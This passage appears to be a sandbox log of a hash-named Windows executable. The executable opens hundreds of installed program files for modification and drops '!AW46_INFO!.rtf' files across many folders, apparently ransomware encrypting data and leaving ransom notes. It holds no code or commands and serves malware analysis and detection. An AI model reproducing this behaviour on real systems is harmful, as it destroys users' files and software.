7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-US.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Mail\WinMail.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Asuncion 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\external_extensions.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Bissau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\invalid32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_100_percent.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse_1.1.200.v20140414-0825.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\README.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_TW.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EET 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\MSBuild\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Brussels 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 